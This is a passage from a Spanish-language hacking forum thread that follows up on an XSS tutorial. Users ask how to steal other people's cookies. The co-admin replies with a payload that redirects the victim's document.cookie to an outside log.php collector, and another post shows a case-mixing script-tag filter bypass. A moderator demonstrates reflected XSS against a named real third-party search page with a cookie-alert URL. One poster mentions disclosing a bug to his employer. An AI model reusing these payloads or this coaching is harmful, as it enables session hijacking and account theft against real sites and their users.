elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
07 Octubre 2008, 04:22  



+  Foro de elhacker.net
|-+  Informática
| |-+  Tutoriales - Documentación (Moderador: yeikos)
| | |-+  Los Poderes Secretos de XSS (Cross Site Scripting)
0 Usuarios y 2 Visitantes están viendo este tema.
Encuesta
Pregunta: Que te pareció este manual?
Malisimo :(
Malo
No aprendí nada
Bueno
Buenisimo :)

Páginas: 1 [2] Ir Abajo Imprimir
Autor Tema: Los Poderes Secretos de XSS (Cross Site Scripting)  (Leído 14938 veces)
deceiver

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #15 en: 21 Marzo 2006, 00:55 »

Era eso muchas gracias.. :)

una ultima cosa las cookies son algo raras usan KIDYMD=* e visto muchos blogs busandolo pero no veo nada en md5  y no encuentro nada de info sobre esto ¿sabes que es esto? gracias

solo encontre blogs y cosas asi con KIDYMD= y demas.. y buscando encontre esto http://users.cjb.net/ebaumcookies/noip.txt ^^
cookies de ebaum o algo asi en las mayorias esta el KIDYMD pero suele estar la pw en md5 y en la mia no :%

Espero tu respuesta un saludo :)
« Última modificación: 21 Marzo 2006, 01:30 por deceiver » En línea
sirdarckcat
sdc
CoAdmin
*****
Desconectado Desconectado

Mensajes: 4.639


HAND


Ver Perfil WWW
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #16 en: 21 Marzo 2006, 08:13 »

En eso ya no te pudo ayudar xD, te toca a ti, ver que hace.. mucha suerte!!
En línea

sirdarckcat
sdc
CoAdmin
*****
Desconectado Desconectado

Mensajes: 4.639


HAND


Ver Perfil WWW
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #17 en: 24 Marzo 2006, 16:50 »

Lamentables estos filtros sugeridos por usuarios de php.net:

http://72.14.203.104/search?q=cache:P6cmiyv-2GIJ:www.php.net/strpos&hl=es&gl=mx&ct=clnk&cd=1
http://www.php.net/strpos

se saltan todos asi:
<sCripT >/*<scriPt >/**/alert();</scrIpt >

xD
En línea

xDie

Desconectado Desconectado

Mensajes: 300



Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #18 en: 13 Julio 2006, 21:56 »

Todavia no entendido muy bien, ya tengo mi log.php y un log2.htm. si yo quiero la cookie de alguien le mando que entre a www.misitio.com/log.php  ????
o que debo hacer?? y que cookie me guarda???
Gracias!!! ;D
En línea


sirdarckcat
sdc
CoAdmin
*****
Desconectado Desconectado

Mensajes: 4.639


HAND


Ver Perfil WWW
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #19 en: 15 Julio 2006, 00:24 »

no.. lee el manual otra ves ;)
debes encontrar un bug de XSS en la web, y colocar un codigo masomenos asi:
Código:
self.location.href='http://misitio.com/log.php?c='+escape(document.cookie);
eso debe mandarte la cookie.. del sitio afectado.

saludos!!
En línea

xDie

Desconectado Desconectado

Mensajes: 300



Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #20 en: 16 Julio 2006, 20:24 »

Ya entendi, justo lei otro manual y me quedo claro.. ahora pregunto en  un a web en asp es metodo get es lo mimso no?Gracias
En línea


sirdarckcat
sdc
CoAdmin
*****
Desconectado Desconectado

Mensajes: 4.639


HAND


Ver Perfil WWW
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #21 en: 18 Julio 2006, 21:56 »

GET es lo que recibes por la barra de direcciones.. mira, pon esto en la barra de direcciones:
javascript:alert(document.location.search):

esa es la info en metodo GET, en metodo POST, se manda con las cabeceras, por lo que no la puedes ver a menos que uses un proxy.

Saludos!!
En línea

[soviet]

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #22 en: 27 Octubre 2006, 23:33 »

soy un fan de este truco juaz':P
En línea




aurican

Desconectado Desconectado

Mensajes: 155


Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #23 en: 11 Noviembre 2006, 11:46 »

sigh no encuentro ningun sitio vulnerable en javascript.
En línea
|Azrack|

Desconectado Desconectado

Mensajes: 85


Enjoy The Silence


Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #24 en: 06 Diciembre 2006, 00:00 »

esta chido el manual tio gracias
« Última modificación: 06 Diciembre 2006, 00:04 por |Firewall| » En línea

Hay gente tan Ignorante que cree en dios.

Status MSN:>><<
samalo

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #25 en: 15 Enero 2007, 22:50 »

Hola Sirdarckcat, perdón por remover el tema pero aún no me ha quedado claro del todo... y he leído bien la guía...

La cosa está en que encontré la vulnerabilidad XSS en el archivo phpinfo.php de esa página... entonces para probar me creé una cuenta y demás y al acceder a ese archivo normalmente con mi cuenta logueada me encuentro que abajo del todo muestra la cookie... el problema es que no sé hacer bien la redirección a mi log.php para que me guarde la cookie de la página... he probado de muchas maneras pero nada, no hay forma... necesito saber que colocar detrás de:

www.xxx.com/phpinfo.php

para que funcione el asunto...

Gracias desde ya. Un saludo
En línea
Lionheart12

Desconectado Desconectado

Mensajes: 79



Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #26 en: 03 Abril 2007, 20:41 »

El manual me parecio bueno. No tengo bien en claro como aplicar los XSS.
En línea

R41N-W4R3

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #27 en: 27 Junio 2007, 17:02 »



    Se que este tema esta cerrado....  pero tras leer el manual de XSS y felicitar a su creador, no solo por un buen manual, sino pq se ve que realmente tiene muuchos conociemientos al respecto. Solo me queda añadir que me gustaria que fuese mas practico, calro..si..ya entiendo.... no puede ni podrá serlo......   

   En definitiva te abre el apetito con este tema tan interesante y supongo que me tendré que pasar muuuchas horas leyendo muchas cosas para sacar realmente jugo a este tutorial. Pero CUANDO NO ES ASI???  jajaja no puede ser de otro modo para aprender... aunke la impaciencia me pueda.

  Feliciataciones nuevamente
En línea
yeikos
Moderador
*****
Desconectado Desconectado

Mensajes: 1.363



Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #28 en: 27 Junio 2007, 17:48 »

¿Algo práctico? mmm, dirijamonos a Google para buscar inurl:buscar.php, intentaremos encontrar algún XSS en el buscador de alguna página.

Primer resulado: UOL :: Buscador, si nos fijamos en la URL podremos observar que el formato es el siguiente: http://buscar.uol.com.ar/radaruol.html?q=palabraabuscar.

Ahora buscaremos palabraabuscar en el código fuente de la página web:

Citar
<input name="q" value="palabraabuscar" type="text" size="64" class="input" >

La palabra se encuentra entre comillas, así que ahora intentaremos pasarle a la variable unas comillas para salir de value y luego un > para salir de la etiqueta input.

http://buscar.uol.com.ar/radaruol.html?q=">palabraabuscar.

Citar
<input name="q" value="">palabraabuscar" type="text" size="64" class="input" >

Claramente es vulnerable a las inyecciones XSS...

http://buscar.uol.com.ar/radaruol.html?q="><script>alert(document.cookie)</script>
« Última modificación: 27 Junio 2007, 17:53 por YeIk0s » En línea
R41N-W4R3

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: Los Poderes Secretos de XSS (Cross Site Scripting)
« Respuesta #29 en: 28 Junio 2007, 16:33 »


 
  Gracias a vosotros e descubierto una vulnerabilidad de XSS en la web de la empresa en la que trabajo. Por supuesto fue puesto en su conociemiento en arreglado en cuestion de minutos.


    Menos mal que he podido averiguarlo aprendiendo de vuestros tutoriales. Aunke la empresa contratada para hacer la pagina web le molesto un poco el asunto, no les quedo otra que reconocerlo.... sobre todo despues de enviarles la captura de pantalla jajajajjaja.

    De nuevo gracias y seguid asi....  especialmente yeikos y sidkart....  os debo una cerveza a cada uno.
En línea
Páginas: 1 [2] Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC
Free counter and web stats